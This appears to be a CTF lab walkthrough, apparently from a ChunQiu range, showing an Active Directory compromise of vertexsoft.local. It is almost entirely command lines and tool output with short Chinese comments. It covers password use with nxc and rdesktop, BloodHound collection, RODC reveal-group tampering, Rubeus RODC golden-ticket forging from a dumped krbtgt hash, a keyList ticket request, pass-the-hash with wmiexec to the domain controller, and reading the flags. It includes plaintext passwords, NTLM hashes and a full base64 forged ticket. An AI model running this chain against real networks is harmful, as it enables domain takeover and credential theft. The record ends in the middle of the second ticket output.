SMB 192.168.8.12 445 RODC [*] Windows Server 2022 Build 20348 x64 (name:RODC) (domain:vertexsoft.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 192.168.8.12 445 RODC [-] vertexsoft.local\IsabellaTech:Nt5w0V4?Ff STATUS_PASSWORD_EXPIRED
CHANGE-P... 192.168.8.12 445 RODC [-] SMB-SAMR password change failed: SAMR SessionError: code: 0xc0020017 - RPC_NT_SERVER_UNAVAILABLE - The RPC server is unavailable.
┌──(root㉿kali)-[~]
└─# rdesktop 192.168.8.12 -u CharlieCloud -p 'u!6vDaGQOA' -d vertexsoft.local -r disk:share=/root/Desktop/ChunQiu/Vertex
Autoselecting keyboard map 'en-us' from locale
Core(warning): Certificate received from server is NOT trusted by this system, an exception has been added by the user to trust this specific certificate.
Failed to initialize NLA, do you have correct Kerberos TGT initialized ?
Core(warning): Certificate received from server is NOT trusted by this system, an exception has been added by the user to trust this specific certificate.
Connection established using SSL.
进来是本地管理员
这里可以用redesktop改密码
mmmmmm mmmm mmmmm mmmm
##""""## ##""## ##"""## ##""""#
## ## ## ## ## ## ##"
####### ## ## ## ## ##
## "##m ## ## ## ## ##m
## ## ##mm## ##mmm## ##mmmm#
"" """ """" """"" """"
flag{13dff5f0-370d-420f-a111-189675d7b157}9. flag08 192.168.8.12
┌──(root㉿kali)-[~/Desktop/ChunQiu/Vertex]
└─# nxc smb 192.168.8.12 -u CharlieCloud -p 'Admin123'
SMB 192.168.8.12 445 RODC [*] Windows Server 2022 Build 20348 x64 (name:RODC) (domain:vertexsoft.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 192.168.8.12 445 RODC [+] vertexsoft.local\CharlieCloud:Admin123 (Pwn3d!)
9.1. Bloodhound
┌──(root㉿kali)-[~/Desktop/ChunQiu/Vertex]
└─# rusthound-ce -u CharlieCloud -p Admin123 -d vertexsoft.local -c All --zip
---------------------------------------------------
Initializing RustHound-CE at 10:32:38 on 01/22/26
Powered by @g0h4n_0
---------------------------------------------------
[2026-01-22T15:32:38Z INFO rusthound_ce] Verbosity level: Info
[2026-01-22T15:32:38Z INFO rusthound_ce] Collection method: All
[2026-01-22T15:32:38Z INFO rusthound_ce::ldap] Connected to VERTEXSOFT.LOCAL Active Directory!
[2026-01-22T15:32:38Z INFO rusthound_ce::ldap] Starting data collection...
[2026-01-22T15:32:38Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2026-01-22T15:32:39Z INFO rusthound_ce::ldap] All data collected for NamingContext DC=vertexsoft,DC=local
[2026-01-22T15:32:39Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2026-01-22T15:32:41Z INFO rusthound_ce::ldap] All data collected for NamingContext CN=Configuration,DC=vertexsoft,DC=local
[2026-01-22T15:32:41Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2026-01-22T15:32:42Z INFO rusthound_ce::ldap] All data collected for NamingContext CN=Schema,CN=Configuration,DC=vertexsoft,DC=local
[2026-01-22T15:32:42Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2026-01-22T15:32:42Z INFO rusthound_ce::ldap] All data collected for NamingContext DC=DomainDnsZones,DC=vertexsoft,DC=local
[2026-01-22T15:32:42Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2026-01-22T15:32:43Z INFO rusthound_ce::ldap] All data collected for NamingContext DC=ForestDnsZones,DC=vertexsoft,DC=local
[2026-01-22T15:32:43Z INFO rusthound_ce::api] Starting the LDAP objects parsing...
[2026-01-22T15:32:43Z INFO rusthound_ce::objects::domain] MachineAccountQuota: 10
[2026-01-22T15:32:43Z INFO rusthound_ce::api] Parsing LDAP objects finished!
[2026-01-22T15:32:43Z INFO rusthound_ce::json::checker] Starting checker to replace some values...
[2026-01-22T15:32:43Z INFO rusthound_ce::json::checker] Checking and replacing some values finished!
[2026-01-22T15:32:43Z INFO rusthound_ce::json::maker::common] 131 users parsed!
[2026-01-22T15:32:43Z INFO rusthound_ce::json::maker::common] 61 groups parsed!
[2026-01-22T15:32:43Z INFO rusthound_ce::json::maker::common] 4 computers parsed!
[2026-01-22T15:32:43Z INFO rusthound_ce::json::maker::common] 1 ous parsed!
[2026-01-22T15:32:43Z INFO rusthound_ce::json::maker::common] 1 domains parsed!
[2026-01-22T15:32:43Z INFO rusthound_ce::json::maker::common] 2 gpos parsed!
[2026-01-22T15:32:43Z INFO rusthound_ce::json::maker::common] 77 containers parsed!
[2026-01-22T15:32:43Z INFO rusthound_ce::json::maker::common] .//20260122103243_vertexsoft-local_rusthound-ce.zip created!
RustHound-CE Enumeration Completed at 10:32:43 on 01/22/26! Happy Graphing!
9.2. RODC Golden tickets
https://www.thehacker.recipes/ad/movement/builtins/rodc#rodc
https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/rodc-golden-tickets
Rubeus.exe golden /rodcNumber:$KBRTGT_NUMBER /flags:forwardable,renewable,enc_pa_rep /nowrap /outfile:ticket.kirbi /aes256:$KRBTGT_AES_KEY /user:USER /id:USER_RID /domain:domain.local /sid:DOMAIN_SID
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process
PS C:\Users\CharlieCloud\Desktop> Set-DomainObject -Identity "RODC$" -Set @{'msDS-RevealOnDemandGroup'='CN=Administrator,CN=Users,DC=VERTEXSOFT,DC=LOCAL'}
PS C:\Users\CharlieCloud\Desktop> Get-DomainObject -Identity "RODC$" -Properties msDS-RevealOnDemandGroup
msds-revealondemandgroup
------------------------
CN=Administrator,CN=Users,DC=vertexsoft,DC=local
PS C:\Users\CharlieCloud\Desktop> Get-ADComputer RODC -Properties msDS-KrbTgtLink
DistinguishedName : CN=RODC,OU=Domain Controllers,DC=vertexsoft,DC=local
DNSHostName : RODC.vertexsoft.local
Enabled : True
msDS-KrbTgtLink : CN=krbtgt_4156,CN=Users,DC=vertexsoft,DC=local
Name : RODC
ObjectClass : computer
ObjectGUID : e8a6323d-bf5c-438c-b6bd-5eb00b0250fa
SamAccountName : RODC$
SID : S-1-5-21-1670446094-1720415002-1380520873-1106
UserPrincipalName :
RID : 00000453 (1107)
User : krbtgt_4156
LM :
NTLM : 34e335179246ef930dc33fd1e3de6e9e
RID : 00000453 (1107)
User : krbtgt_4156
LM :
NTLM : 34e335179246ef930dc33fd1e3de6e9e
PS C:\Users\CharlieCloud\Desktop> .\Rubeus.exe golden /rodcNumber:4156 /rc4:34e335179246ef930dc33fd1e3de6e9e /user:Administrator /id:500 /domain:vertexsoft.local /sid:S-1-5-21-1670446094-1720415002-1380520873 /nowrap /ptt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.3
[*] Action: Build TGT
[*] Building PAC
[*] Domain : VERTEXSOFT.LOCAL (VERTEXSOFT)
[*] SID : S-1-5-21-1670446094-1720415002-1380520873
[*] UserId : 500
[*] Groups : 520,512,513,519,518
[*] ServiceKey : 34E335179246EF930DC33FD1E3DE6E9E
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_MD5
[*] KDCKey : 34E335179246EF930DC33FD1E3DE6E9E
[*] KDCKeyType : KERB_CHECKSUM_HMAC_MD5
[*] Service : krbtgt
[*] Target : vertexsoft.local
[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for 'Administrator@vertexsoft.local'
[*] AuthTime : 1/23/2026 12:22:32 AM
[*] StartTime : 1/23/2026 12:22:32 AM
[*] EndTime : 1/23/2026 10:22:32 AM
[*] RenewTill : 1/30/2026 12:22:32 AM
[*] base64(ticket.kirbi):
doIFpjCCBaKgAwIBBaEDAgEWooIElzCCBJNhggSPMIIEi6ADAgEFoRIbEFZFUlRFWFNPRlQuTE9DQUyiJTAjoAMCAQKhHDAaGwZrcmJ0Z3QbEHZlcnRleHNvZnQubG9jYWyjggRHMIIEQ6ADAgEXoQYCBBA8AACiggQyBIIELj/Dfb0TodSF0yyX9MPR0NvU586Wc9KOTcQT9Dr37Gr2Uq2d7f+/P00b9gd/TbrsIY/Yo1s6gRsJjllwrVn9PIep9DzPUL/R591KA7uGpEa4g8KEOhpDxm+IbGNljuVOJN96D+jLKYUwoWbFsNEHtbe8KKbmPbv/fWLt6bZllKY9tAJP/D2GFrdcpQ7jfnz94wTR34t7l/O/gPVOMbYL3HwBsCdyYG5pybt9wcIxlneK7QlsvOt3KccEDwJ7BeaOZde+kaITGTYavgSpscgcTAj6aOPkHZrdwkWUyYhpeew4tMyR34jQI3x2KY2dFWo7oOW2DrozCrAkSURGQQ2+PRrjecMMlD1CKuRCZHTLl91l0INPuH5sq/Rzl/V0pwII6BW5DO46WxlykpwgC6EPyN6k6GwvxaevO8byC+8FEzMdQVMN5mu6i4biXPLcaj/W6Y/lIF92ALoUdVNulxIpYRmyN7G/6JYId+VLqXZUm93tUI6oZULzO1i/TW7NV1I12ki3sb5B2QgLqRDf0Wgq2DWtD2w/L8myTNtciiA69LVSatFdou/h6caQilmzDHC1lDKZX+3c35ILOTDov6ShAXAtflZ1OVHa06Bqhkqh0PdVn5O4C84zSI+A4DfgZ0xKO5YqpSjGh/fnzZAa67VdY/vimsHSgOE0IxBxWGYt/z9pC8Hdq5dvPK7TemEQldUx/1fOELFQW9/6Ar6H/TYP/s/j7zv6g2Rikdz/PWKKF3CO8ScjYRmkBiveA/m/BIqAirOHuvUM4o1TEcBWpivAkNaSOsTMaEb5eMhRvliaVzHyHyzrBmZkVsdJqIkUyBRgoM7HlHkbBbwCv1VTxmru3Q66Eou37opp/mqffaLrXp1eFEGYII8Uh7ynbiV6LmigVldnkTb72vE5nf4obZLSRO5Oww5WyPqLpxQ5AgaLawfSpMVaIODx5iSbSxNEc0TuV12kshDP1E/JcK4OvBIFhLglhvYMpYYACY28vU40b2n9su5txyy3m+tRfN6Lkm87O+WUObfrCxC1qmMCOz8fVWNLIStXnjWldjMBWaUf9eftVxfsEMqwGwZ8KGCZH+gtDOyHHZ5+l62LB1MCfrjtF54yD4f+kNblJ9cKqkkejWNeQ+JOKJCXFcfsQIGD/dZm2iiIOzYHQaQ55ynfaNJFglloSdamBHuv+IB6yq+RkW/AoYSN6gnJlzQbJhfmReuUgs1mJrCnEu/G6PNJ7vb4ZMmwc5WCI4pYRtfs9QynN/dK54Rn+cz/5jsRlI/3N3eP55nRa9qffX7SPGMEErnLTrRbIvt31LsyBGKBdeGDXTrgG8/eezUAnSTUrjOkje75n36L2f6tJM0lsVQ4lEn6l2sJkE619mwfKOkNFCISxdQppDxE/eOrSF/3Biqzje8JT531GFwsxnrHMrccMBgZo4H6MIH3oAMCAQCige8Egex9gekwgeaggeMwgeAwgd2gGzAZoAMCARehEgQQefDz41yXMIVr5ty8aWYTLKESGxBWRVJURVhTT0ZULkxPQ0FMohowGKADAgEBoREwDxsNQWRtaW5pc3RyYXRvcqMHAwUAQOAAAKQRGA8yMDI2MDEyMjE2MjIzMlqlERgPMjAyNjAxMjIxNjIyMzJaphEYDzIwMjYwMTIzMDIyMjMyWqcRGA8yMDI2MDEyOTE2MjIzMlqoEhsQVkVSVEVYU09GVC5MT0NBTKklMCOgAwIBAqEcMBobBmtyYnRndBsQdmVydGV4c29mdC5sb2NhbA==
[+] Ticket successfully imported!
获取一下
PS C:\Users\CharlieCloud\Desktop> nltest /dsgetdc:vertexsoft.local /writable
DC: \\DC.vertexsoft.local
Address: \\192.168.1.11
Dom Guid: 73f6ee42-1629-410f-91b3-06ee3e06dedc
Dom Name: vertexsoft.local
Forest Name: vertexsoft.local
Dc Site Name: Default-First-Site-Name
Our Site Name: Default-First-Site-Name
Flags: PDC GC DS LDAP KDC TIMESERV GTIMESERV WRITABLE DNS_DC DNS_DOMAIN DNS_FOREST CLOSE_SITE FULL_SECRET WS DS_8 DS_9 DS_10 KEYLIST
The command completed successfully
Rubeus.exe asktgs /enctype:rc4 /keyList /service:krbtgt/vertexsoft.local /dc:DC.vertexsoft.local /ticket:doIFpjCCBaKgAwIBBaEDAgEWooIElzCCBJNhggSPMIIEi6ADAgEFoRIbEFZFUlRFWFNPRlQuTE9DQUyiJTAjoAMCAQKhHDAaGwZrcmJ0Z3QbEHZlcnRleHNvZnQubG9jYWyjggRHMIIEQ6ADAgEXoQYCBBA8AACiggQyBIIELj/Dfb0TodSF0yyX9MPR0NvU586Wc9KOTcQT9Dr37Gr2Uq2d7f+/P00b9gd/TbrsIY/Yo1s6gRsJjllwrVn9PIep9DzPUL/R591KA7uGpEa4g8KEOhpDxm+IbGNljuVOJN96D+jLKYUwoWbFsNEHtbe8KKbmPbv/fWLt6bZllKY9tAJP/D2GFrdcpQ7jfnz94wTR34t7l/O/gPVOMbYL3HwBsCdyYG5pybt9wcIxlneK7QlsvOt3KccEDwJ7BeaOZde+kaITGTYavgSpscgcTAj6aOPkHZrdwkWUyYhpeew4tMyR34jQI3x2KY2dFWo7oOW2DrozCrAkSURGQQ2+PRrjecMMlD1CKuRCZHTLl91l0INPuH5sq/Rzl/V0pwII6BW5DO46WxlykpwgC6EPyN6k6GwvxaevO8byC+8FEzMdQVMN5mu6i4biXPLcaj/W6Y/lIF92ALoUdVNulxIpYRmyN7G/6JYId+VLqXZUm93tUI6oZULzO1i/TW7NV1I12ki3sb5B2QgLqRDf0Wgq2DWtD2w/L8myTNtciiA69LVSatFdou/h6caQilmzDHC1lDKZX+3c35ILOTDov6ShAXAtflZ1OVHa06Bqhkqh0PdVn5O4C84zSI+A4DfgZ0xKO5YqpSjGh/fnzZAa67VdY/vimsHSgOE0IxBxWGYt/z9pC8Hdq5dvPK7TemEQldUx/1fOELFQW9/6Ar6H/TYP/s/j7zv6g2Rikdz/PWKKF3CO8ScjYRmkBiveA/m/BIqAirOHuvUM4o1TEcBWpivAkNaSOsTMaEb5eMhRvliaVzHyHyzrBmZkVsdJqIkUyBRgoM7HlHkbBbwCv1VTxmru3Q66Eou37opp/mqffaLrXp1eFEGYII8Uh7ynbiV6LmigVldnkTb72vE5nf4obZLSRO5Oww5WyPqLpxQ5AgaLawfSpMVaIODx5iSbSxNEc0TuV12kshDP1E/JcK4OvBIFhLglhvYMpYYACY28vU40b2n9su5txyy3m+tRfN6Lkm87O+WUObfrCxC1qmMCOz8fVWNLIStXnjWldjMBWaUf9eftVxfsEMqwGwZ8KGCZH+gtDOyHHZ5+l62LB1MCfrjtF54yD4f+kNblJ9cKqkkejWNeQ+JOKJCXFcfsQIGD/dZm2iiIOzYHQaQ55ynfaNJFglloSdamBHuv+IB6yq+RkW/AoYSN6gnJlzQbJhfmReuUgs1mJrCnEu/G6PNJ7vb4ZMmwc5WCI4pYRtfs9QynN/dK54Rn+cz/5jsRlI/3N3eP55nRa9qffX7SPGMEErnLTrRbIvt31LsyBGKBdeGDXTrgG8/eezUAnSTUrjOkje75n36L2f6tJM0lsVQ4lEn6l2sJkE619mwfKOkNFCISxdQppDxE/eOrSF/3Biqzje8JT531GFwsxnrHMrccMBgZo4H6MIH3oAMCAQCige8Egex9gekwgeaggeMwgeAwgd2gGzAZoAMCARehEgQQefDz41yXMIVr5ty8aWYTLKESGxBWRVJURVhTT0ZULkxPQ0FMohowGKADAgEBoREwDxsNQWRtaW5pc3RyYXRvcqMHAwUAQOAAAKQRGA8yMDI2MDEyMjE2MjIzMlqlERgPMjAyNjAxMjIxNjIyMzJaphEYDzIwMjYwMTIzMDIyMjMyWqcRGA8yMDI2MDEyOTE2MjIzMlqoEhsQVkVSVEVYU09GVC5MT0NBTKklMCOgAwIBAqEcMBobBmtyYnRndBsQdmVydGV4c29mdC5sb2NhbA==
┌──(root㉿kali)-[~/…/ChunQiu/Vertex/CodeSentinel/vertexsoftbackup]
└─# echo "doIFpjCCBaKgAwIBBaEDAgEWooIElzCCBJNhggSPMIIEi6ADAgEFoRIbEFZFUlRFWFNPRlQuTE9DQUyiJTAjoAMCAQKhHDAaGwZrcmJ0Z3QbEHZlcnRleHNvZnQubG9jYWyjggRHMIIEQ6ADAgEXoQYCBBA8AACiggQyBIIELj/Dfb0TodSF0yyX9MPR0NvU586Wc9KOTcQT9Dr37Gr2Uq2d7f+/P00b9gd/TbrsIY/Yo1s6gRsJjllwrVn9PIep9DzPUL/R591KA7uGpEa4g8KEOhpDxm+IbGNljuVOJN96D+jLKYUwoWbFsNEHtbe8KKbmPbv/fWLt6bZllKY9tAJP/D2GFrdcpQ7jfnz94wTR34t7l/O/gPVOMbYL3HwBsCdyYG5pybt9wcIxlneK7QlsvOt3KccEDwJ7BeaOZde+kaITGTYavgSpscgcTAj6aOPkHZrdwkWUyYhpeew4tMyR34jQI3x2KY2dFWo7oOW2DrozCrAkSURGQQ2+PRrjecMMlD1CKuRCZHTLl91l0INPuH5sq/Rzl/V0pwII6BW5DO46WxlykpwgC6EPyN6k6GwvxaevO8byC+8FEzMdQVMN5mu6i4biXPLcaj/W6Y/lIF92ALoUdVNulxIpYRmyN7G/6JYId+VLqXZUm93tUI6oZULzO1i/TW7NV1I12ki3sb5B2QgLqRDf0Wgq2DWtD2w/L8myTNtciiA69LVSatFdou/h6caQilmzDHC1lDKZX+3c35ILOTDov6ShAXAtflZ1OVHa06Bqhkqh0PdVn5O4C84zSI+A4DfgZ0xKO5YqpSjGh/fnzZAa67VdY/vimsHSgOE0IxBxWGYt/z9pC8Hdq5dvPK7TemEQldUx/1fOELFQW9/6Ar6H/TYP/s/j7zv6g2Rikdz/PWKKF3CO8ScjYRmkBiveA/m/BIqAirOHuvUM4o1TEcBWpivAkNaSOsTMaEb5eMhRvliaVzHyHyzrBmZkVsdJqIkUyBRgoM7HlHkbBbwCv1VTxmru3Q66Eou37opp/mqffaLrXp1eFEGYII8Uh7ynbiV6LmigVldnkTb72vE5nf4obZLSRO5Oww5WyPqLpxQ5AgaLawfSpMVaIODx5iSbSxNEc0TuV12kshDP1E/JcK4OvBIFhLglhvYMpYYACY28vU40b2n9su5txyy3m+tRfN6Lkm87O+WUObfrCxC1qmMCOz8fVWNLIStXnjWldjMBWaUf9eftVxfsEMqwGwZ8KGCZH+gtDOyHHZ5+l62LB1MCfrjtF54yD4f+kNblJ9cKqkkejWNeQ+JOKJCXFcfsQIGD/dZm2iiIOzYHQaQ55ynfaNJFglloSdamBHuv+IB6yq+RkW/AoYSN6gnJlzQbJhfmReuUgs1mJrCnEu/G6PNJ7vb4ZMmwc5WCI4pYRtfs9QynN/dK54Rn+cz/5jsRlI/3N3eP55nRa9qffX7SPGMEErnLTrRbIvt31LsyBGKBdeGDXTrgG8/eezUAnSTUrjOkje75n36L2f6tJM0lsVQ4lEn6l2sJkE619mwfKOkNFCISxdQppDxE/eOrSF/3Biqzje8JT531GFwsxnrHMrccMBgZo4H6MIH3oAMCAQCige8Egex9gekwgeaggeMwgeAwgd2gGzAZoAMCARehEgQQefDz41yXMIVr5ty8aWYTLKESGxBWRVJURVhTT0ZULkxPQ0FMohowGKADAgEBoREwDxsNQWRtaW5pc3RyYXRvcqMHAwUAQOAAAKQRGA8yMDI2MDEyMjE2MjIzMlqlERgPMjAyNjAxMjIxNjIyMzJaphEYDzIwMjYwMTIzMDIyMjMyWqcRGA8yMDI2MDEyOTE2MjIzMlqoEhsQVkVSVEVYU09GVC5MT0NBTKklMCOgAwIBAqEcMBobBmtyYnRndBsQdmVydGV4c29mdC5sb2NhbA==" | base64 -d > admin.kirbi
┌──(root㉿kali)-[~/…/ChunQiu/Vertex/CodeSentinel/vertexsoftbackup]
└─# nxc smb 192.168.1.11 -u administrator -H EBC447441306783742EE3DF769051B75
SMB 192.168.1.11 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:vertexsoft.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 192.168.1.11 445 DC [+] vertexsoft.local\administrator:EBC447441306783742EE3DF769051B75 (Pwn3d!)
┌──(root㉿kali)-[~/Desktop/ChunQiu/Vertex]
└─# impacket-wmiexec 'vertexsoft.local/administrator@192.168.1.11' -hashes :EBC447441306783742EE3DF769051B75
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>cd users
C:\users>cd administrator
C:\users\administrator>dir
Volume in drive C has no label.
Volume Serial Number is DE1E-1DFE
Directory of C:\users\administrator
01/23/2026 12:40 AM <DIR> .
07/11/2024 08:42 PM <DIR> ..
07/11/2024 08:42 PM <DIR> 3D Objects
07/11/2024 08:42 PM <DIR> Contacts
07/17/2024 12:42 PM <DIR> Desktop
07/11/2024 08:42 PM <DIR> Documents
07/11/2024 08:42 PM <DIR> Downloads
07/11/2024 08:42 PM <DIR> Favorites
07/17/2024 01:45 PM <DIR> flag
07/11/2024 08:42 PM <DIR> Links
07/11/2024 08:42 PM <DIR> Music
07/11/2024 08:42 PM <DIR> Pictures
07/11/2024 08:42 PM <DIR> Saved Games
07/11/2024 08:42 PM <DIR> Searches
07/11/2024 08:42 PM <DIR> Videos
0 File(s) 0 bytes
15 Dir(s) 27,860,480,000 bytes free
C:\users\administrator>cd flag
type flaC:\users\administrator\flag>type flag.txt
flag{81c860d4-5da1-40d6-bdba-33dc58b3c035}
PS C:\Users\CharlieCloud\Desktop> Get-DomainObject 'CN=RODC,OU=Domain Controllers,DC=vertexsoft,DC=local' -Properties 'msDS-RevealOnDemandGroup' | Select-Object -ExpandProperty 'msDS-RevealOnDemandGroup'
CN=Administrator,CN=Users,DC=vertexsoft,DC=local
PS C:\Users\CharlieCloud\Desktop> Set-DomainObject -Identity 'CN=RODC,OU=Domain Controllers,DC=vertexsoft,DC=local' -Set @{'msDS-RevealOnDemandGroup'=@(
>> 'CN=Administrator,CN=Users,DC=vertexsoft,DC=local'
>> )}
PS C:\Users\CharlieCloud\Desktop> Get-DomainObject 'CN=RODC,OU=Domain Controllers,DC=vertexsoft,DC=local' -Properties 'msDS-NeverRevealGroup' | Select-Object -ExpandProperty 'msDS-NeverRevealGroup'
CN=Denied RODC Password Replication Group,CN=Users,DC=vertexsoft,DC=local
CN=Account Operators,CN=Builtin,DC=vertexsoft,DC=local
CN=Server Operators,CN=Builtin,DC=vertexsoft,DC=local
CN=Backup Operators,CN=Builtin,DC=vertexsoft,DC=local
CN=Administrators,CN=Builtin,DC=vertexsoft,DC=local
PS C:\Users\CharlieCloud\Desktop> Set-DomainObject -Identity 'CN=RODC,OU=Domain Controllers,DC=vertexsoft,DC=local' -Clear 'msDS-NeverRevealGroup'
PS C:\Users\CharlieCloud\Desktop> Get-DomainObject -Identity RODC$
logoncount : 23
msds-krbtgtlink : CN=krbtgt_4156,CN=Users,DC=vertexsoft,DC=local
iscriticalsystemobject : True
useraccountcontrol : WORKSTATION_TRUST_ACCOUNT, TRUSTED_TO_AUTH_FOR_DELEGATION, PARTIAL_SECRETS_ACCOUNT
distinguishedname : CN=RODC,OU=Domain Controllers,DC=vertexsoft,DC=local
objectclass : {top, person, organizationalPerson, user...}
displayname : RODC$
lastlogontimestamp : 1/22/2026 7:28:56 PM
name : RODC
operatingsystemversion : 10.0 (20348)
usncreated : 49201
msds-authenticatedatdc : CN=RODC,OU=Domain Controllers,DC=vertexsoft,DC=local
samaccountname : RODC$
localpolicyflags : 0
codepage : 0
samaccounttype : MACHINE_ACCOUNT
msds-revealedusers : {B:96:A000090001000000726BA01C03000000FEF7B65AFA50694187DFAFC8D205DFE395320000000000009532000000000
000:CN=krbtgt_4156,CN=Users,DC=vertexsoft,DC=local, B:96:7D00090001000000726BA01C03000000FEF7B65AFA
50694187DFAFC8D205DFE396320000000000009632000000000000:CN=krbtgt_4156,CN=Users,DC=vertexsoft,DC=loc
al, B:96:5E00090001000000726BA01C03000000FEF7B65AFA50694187DFAFC8D205DFE395320000000000009532000000
000000:CN=krbtgt_4156,CN=Users,DC=vertexsoft,DC=local, B:96:5A00090001000000726BA01C03000000FEF7B65
AFA50694187DFAFC8D205DFE395320000000000009532000000000000:CN=krbtgt_4156,CN=Users,DC=vertexsoft,DC=
local...}
accountexpires : NEVER
countrycode : 0
whenchanged : 1/22/2026 4:43:28 PM
instancetype : 4
msdfsr-computerreferencebl : CN=RODC,CN=Topology,CN=Domain System Volume,CN=DFSR-GlobalSettings,CN=System,DC=vertexsoft,DC=local
objectguid : e8a6323d-bf5c-438c-b6bd-5eb00b0250fa
operatingsystem : Windows Server 2022 Datacenter
lastlogon : 1/22/2026 7:29:11 PM
msds-revealeddsas : {CN=RODC,OU=Domain Controllers,DC=vertexsoft,DC=local, CN=RODC,OU=Domain
Controllers,DC=vertexsoft,DC=local, CN=RODC,OU=Domain Controllers,DC=vertexsoft,DC=local,
CN=RODC,OU=Domain Controllers,DC=vertexsoft,DC=local...}
msds-allowedtoactonbehalfofotheridentity : {1, 0, 4, 128...}
objectcategory : CN=Computer,CN=Schema,CN=Configuration,DC=vertexsoft,DC=local
dscorepropagationdata : {7/17/2024 4:45:07 AM, 7/11/2024 1:16:42 PM, 7/11/2024 1:13:22 PM, 1/1/1601 12:00:00 AM}
serviceprincipalname : {Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/RODC.vertexsoft.local, HOST/RODC/VERTEXSOFT,
HOST/RODC.vertexsoft.local/VERTEXSOFT, GC/RODC.vertexsoft.local/vertexsoft.local...}
serverreferencebl : CN=RODC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=vertexsoft,DC=local
whencreated : 7/11/2024 1:13:22 PM
badpasswordtime : 1/22/2026 7:28:56 PM
badpwdcount : 0
managedby : CN=CharlieCloud,CN=Users,DC=vertexsoft,DC=local
cn : RODC
msds-revealondemandgroup : CN=Administrator,CN=Users,DC=vertexsoft,DC=local
objectsid : S-1-5-21-1670446094-1720415002-1380520873-1106
primarygroupid : 521
msds-authenticatedtoaccountlist : {CN=CharlieCloud,CN=Users,DC=vertexsoft,DC=local, CN=RODC,OU=Domain
Controllers,DC=vertexsoft,DC=local, CN=WIN-CORP16,CN=Computers,DC=vertexsoft,DC=local,
CN=WIN-CORP36-1,CN=Computers,DC=vertexsoft,DC=local...}
pwdlastset : 1/22/2026 7:28:56 PM
msds-supportedencryptiontypes : 28
usnchanged : 49861
lastlogoff : 1/1/1601 8:00:00 AM
dnshostname : RODC.vertexsoft.local
PS C:\Users\CharlieCloud\Desktop> Get-ADComputer RODC -Properties msDS-KrbTgtLink
DistinguishedName : CN=RODC,OU=Domain Controllers,DC=vertexsoft,DC=local
DNSHostName : RODC.vertexsoft.local
Enabled : True
msDS-KrbTgtLink : CN=krbtgt_4156,CN=Users,DC=vertexsoft,DC=local
Name : RODC
ObjectClass : computer
ObjectGUID : e8a6323d-bf5c-438c-b6bd-5eb00b0250fa
SamAccountName : RODC$
SID : S-1-5-21-1670446094-1720415002-1380520873-1106
UserPrincipalName :
PS C:\Users\CharlieCloud\Desktop> Get-ADUser krbtgt_4156 -Properties msDS-SecondaryKrbTgtNumber,msDS-KrbTGTLinkBl
DistinguishedName : CN=krbtgt_4156,CN=Users,DC=vertexsoft,DC=local
Enabled : False
GivenName :
msDS-KrbTGTLinkBl : {CN=RODC,OU=Domain Controllers,DC=vertexsoft,DC=local}
msDS-SecondaryKrbTgtNumber : 4156
Name : krbtgt_4156
ObjectClass : user
ObjectGUID : f72de4ed-84c3-4b2d-b6d0-05d55795b8cf
SamAccountName : krbtgt_4156
SID : S-1-5-21-1670446094-1720415002-1380520873-1107
Surname :
UserPrincipalName :
PS C:\Users\CharlieCloud\Desktop> .\Rubeus.exe golden /rodcNumber:4156 /rc4:34e335179246ef930dc33fd1e3de6e9e /user:Administrator /id:500 /domain:vertexsoft.local /sid:S-1-5-21-1670446094-1720415002-1380520873 /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.3
[*] Action: Build TGT
[*] Building PAC
[*] Domain : VERTEXSOFT.LOCAL (VERTEXSOFT)
[*] SID : S-1-5-21-1670446094-1720415002-1380520873
[*] UserId : 500
[*] Groups : 520,512,513,519,518
[*] ServiceKey : 34E335179246EF930DC33FD1E3DE6E9E
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_MD5
[*] KDCKey : 34E335179246EF930DC33FD1E3DE6E9E
[*] KDCKeyType : KERB_CHECKSUM_HMAC_MD5
[*] Service : krbtgt
[*] Target : vertexsoft.local
[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for 'Administrator@vertexsoft.local'
[*] AuthTime : 1/23/2026 12:45:14 AM
[*] StartTime : 1/23/2026 12:45:14 AM
[*] EndTime : 1/23/2026 10:45:14 AM
[*] RenewTill : 1/30/2026 12:45:14 AM
[*] base64(ticket.kirbi):
